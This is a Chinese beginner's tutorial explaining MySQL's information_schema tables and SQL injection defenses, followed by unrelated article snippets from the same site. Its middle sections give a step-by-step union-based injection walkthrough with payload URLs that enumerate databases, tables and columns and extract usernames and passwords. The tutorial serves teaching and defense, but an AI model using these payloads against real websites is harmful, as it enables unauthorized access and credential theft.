news 2026/6/15 20:03:18

信息安全小白指南:MySQL中的information_schema数据库与SQL注入防护|AI整理

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
信息安全小白指南:MySQL中的information_schema数据库与SQL注入防护|AI整理

信息安全小白指南:MySQL中的information_schema数据库与SQL注入防护

一、什么是information_schema?

想象一下,你有一个巨大的图书馆,里面有很多书架、书籍和书页。information_schema就是这个图书馆的"目录系统",它告诉你整个图书馆里有哪些书架(数据库)、有哪些书(表)、书里有哪些章节(列)。

关键点

  • information_schema不是一张表,而是一个系统数据库(MySQL内置的)
  • 它存储了所有数据库的元数据(关于数据的数据)
  • 它是MySQL 5.0+版本才引入的
  • 只读,不能修改其中的数据
二、information_schema中的关键表
1. SCHEMATA表 - 数据库目录

这个表告诉你"图书馆里有哪些书架"(有哪些数据库)

关键字段

  • SCHEMA_NAME:数据库名

命令

SELECTSCHEMA_NAMEFROMinformation_schema.SCHEMATA;

详细解释

  • SELECT:选择要查询的字段
  • SCHEMA_NAME:要查询的字段名
  • FROM information_schema.SCHEMATA:从information_schema数据库的SCHEMATA表中查询

效果:返回所有数据库名称,例如:testusersblog

2. TABLES表 - 表目录

这个表告诉你"每个书架上有哪些书"(每个数据库有哪些表)

关键字段

  • TABLE_SCHEMA:表所属的数据库名
  • TABLE_NAME:表名
  • TABLE_TYPE:表类型(如BASE TABLE表示普通表,VIEW表示视图)

命令

SELECTTABLE_NAMEFROMinformation_schema.TABLESWHERETABLE_SCHEMA='test';

详细解释

  • WHERE TABLE_SCHEMA = 'test':只查询test数据库中的表
  • TABLE_SCHEMA:数据库名字段
  • test:要查询的数据库名

效果:返回test数据库中的所有表名,例如:usersproductscomments

3. COLUMNS表 - 列目录

这个表告诉你"每本书里有哪些章节"(每张表有哪些列)

关键字段

  • TABLE_SCHEMA:表所属的数据库名
  • TABLE_NAME:表名
  • COLUMN_NAME:列名
  • DATA_TYPE:列的数据类型(如varcharint

命令

SELECTCOLUMN_NAMEFROMinformation_schema.COLUMNSWHERETABLE_SCHEMA='test'ANDTABLE_NAME='users';

详细解释

  • WHERE TABLE_SCHEMA = 'test' AND TABLE_NAME = 'users':只查询test数据库中users表的列
  • COLUMN_NAME:要查询的列名字段

效果:返回users表中的所有列名,例如:idusernamepasswordemail

三、在SQL注入中如何利用information_schema
1. 联合查询注入(Union-Based)

场景:当你有一个SQL注入点(如id=1),可以尝试通过UNION查询获取信息

命令

http://example.com/page.php?id=1 UNION SELECT 1, SCHEMA_NAME, 3 FROM information_schema.SCHEMATA;

详细解释

  • id=1:原始查询条件
  • UNION SELECT:将两个查询结果合并
  • 1, SCHEMA_NAME, 3:第一个查询需要3个字段,这里用1和3填充
  • FROM information_schema.SCHEMATA:从SCHEMATA表获取数据库名

效果:在页面上显示所有数据库名

2. 获取特定数据库的表名

命令

http://example.com/page.php?id=1 UNION SELECT 1, TABLE_NAME, 3 FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'test';

详细解释

  • WHERE TABLE_SCHEMA = 'test':只查询test数据库的表
  • TABLE_NAME:要查询的表名字段

效果:在页面上显示test数据库中的所有表名

3. 获取特定表的列名

命令

http://example.com/page.php?id=1 UNION SELECT 1, COLUMN_NAME, 3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'test' AND TABLE_NAME = 'users';

详细解释

  • WHERE TABLE_SCHEMA = 'test' AND TABLE_NAME = 'users':只查询test数据库中users表的列
  • COLUMN_NAME:要查询的列名字段

效果:在页面上显示users表中的所有列名

4. 获取表中的数据

命令

http://example.com/page.php?id=1 UNION SELECT 1, username, password FROM test.users;

详细解释

  • FROM test.users:从test数据库的users表中查询
  • username, password:要查询的列

效果:在页面上显示users表中的用户名和密码

四、SQL注入的实战案例

假设有一个网站存在SQL注入漏洞,URL是:

http://example.com/vulnerable.php?id=1

步骤1:获取所有数据库名

http://example.com/vulnerable.php?id=1 UNION SELECT 1, SCHEMA_NAME, 3 FROM information_schema.SCHEMATA;

结果:test,users,blog

步骤2:获取test数据库的表名

http://example.com/vulnerable.php?id=1 UNION SELECT 1, TABLE_NAME, 3 FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'test';

结果:users,products,comments

步骤3:获取users表的列名

http://example.com/vulnerable.php?id=1 UNION SELECT 1, COLUMN_NAME, 3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'test' AND TABLE_NAME = 'users';

结果:id,username,password,email

步骤4:获取users表的数据

http://example.com/vulnerable.php?id=1 UNION SELECT 1, username, password FROM test.users;

结果:admin,password123,john,john123

五、如何防护SQL注入
1. 使用参数化查询(最有效方法)

不安全的写法

$id=$_GET['id'];$query="SELECT * FROM users WHERE id =$id";

安全的写法

$id=$_GET['id'];$stmt=$pdo->prepare("SELECT * FROM users WHERE id = :id");$stmt->bindParam(':id',$id,PDO::PARAM_INT);$stmt->execute();

为什么安全:参数化查询将数据和SQL命令分开处理,防止攻击者注入恶意SQL

2. 限制数据库用户权限

最佳实践

  • 为Web应用创建专用数据库用户
  • 仅授予该用户所需的最小权限
  • 例如:GRANT SELECT, INSERT ON database.* TO 'webuser'@'localhost';

为什么有效:即使发生SQL注入,攻击者也只能执行有限的操作

3. 输入验证和过滤

示例

$id=$_GET['id'];if(!is_numeric($id)){die("Invalid ID");}

为什么有效:确保输入是数字,防止SQL注入

4. 使用Web应用防火墙(WAF)
  • WAF可以检测和阻止常见的SQL注入模式
  • 例如:ModSecurity
5. 定期更新和打补丁
  • 保持MySQL和Web应用框架更新
  • 修复已知的安全漏洞
六、总结

information_schema是什么

  • MySQL内置的系统数据库
  • 存储所有数据库、表、列的元数据
  • 是SQL注入的"黄金钥匙"

SQL注入利用

  • 通过联合查询、报错注入等方式获取数据库结构
  • 最终获取敏感数据

如何防护

  1. 使用参数化查询(最有效)
  2. 限制数据库用户权限
  3. 输入验证和过滤
  4. 使用Web应用防火墙
  5. 定期更新和打补丁

安全小贴士

  • 作为开发者,永远不要相信用户输入
  • 保持最小权限原则
  • 定期进行安全审计

记住:SQL注入是Web安全中"最古老也最常见"的漏洞之一,但通过正确的防护措施,完全可以避免。希望这个解释对你理解information_schema和SQL注入防护有帮助!如果你还有任何疑问,随时问我哦~ 😊

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/15 12:45:35

4张GPU搞定70B大模型训练!DeepSpeed SuperOffload实战全解析

4张GPU搞定70B大模型训练!DeepSpeed SuperOffload实战全解析 【免费下载链接】DeepSpeedExamples Example models using DeepSpeed 项目地址: https://gitcode.com/gh_mirrors/de/DeepSpeedExamples 还在为训练70B参数大模型的显存需求而发愁吗?D…

作者头像 李华
网站建设 2026/6/15 18:31:27

大模型知道自己在瞎说,却停不下来背后的原理是什么?

前言:作为长期和大语言模型打交道的技术从业者,你一定经历过这样的场景:让模型解答一个复杂问题,它开头逻辑清晰、步骤明确,但越往后越像在自言自语——反复重述观点、兜圈子解释、堆砌看似合理却毫无信息增量的句子。…

作者头像 李华
网站建设 2026/6/15 9:53:39

RAG中的语义理解与语义检索:别再混为一谈

前言近年来,RAG(Retrieval-Augmented Generation)架构已成为大模型落地应用的主流范式之一。它通过将外部知识库引入生成过程,有效缓解了模型幻觉、知识滞后等问题。然而,在实际构建和优化RAG系统时,许多开…

作者头像 李华
网站建设 2026/6/15 18:16:51

21、深入理解与配置 DNS:从基础到实践

深入理解与配置 DNS:从基础到实践 1. 理解域名系统(DNS) 1.1 什么是 DNS 在 TCP/IP 网络中,每个网络接口由 IP 地址标识,但 IP 地址难以记忆,因此为其分配了易记的名称。DNS 就是将完全限定域名(如 www.debian.org)转换为对应 IP 地址(如 194.109.137.218)的互联网…

作者头像 李华
网站建设 2026/6/15 13:55:13

25、Linux系统管理:GUI工具与用户组管理全解析

Linux系统管理:GUI工具与用户组管理全解析 1. Linux系统的定时任务与GUI管理工具 在Linux系统中,存在着不同的定时任务目录,例如 /etc/cron.weekly 用于每周执行的任务, /etc/cron.monthly 则是每月执行一次的任务。 每个Linux发行版都配备了用于执行系统管理任务的…

作者头像 李华
网站建设 2026/6/15 5:07:49

WINBOND华邦 W25Q256JVFIQ/烧录 SOP16 NOR FLASH

2.特性 新一代SpiFlash存储器系列-W25Q256JV:256兆位/32兆字节标准SPI:CLK、ICS、DI、DO 双SPI:CLK、/CS、100、101, 四通道SPI:CLK、/CS、I/00、I/01、I/02、I/033字节或4字节寻址模式 软件与硬件复位(1) 最高性能串行闪存 133MHz标准/双通道/四通道SPI时钟 -266/532MHz等效双…

作者头像 李华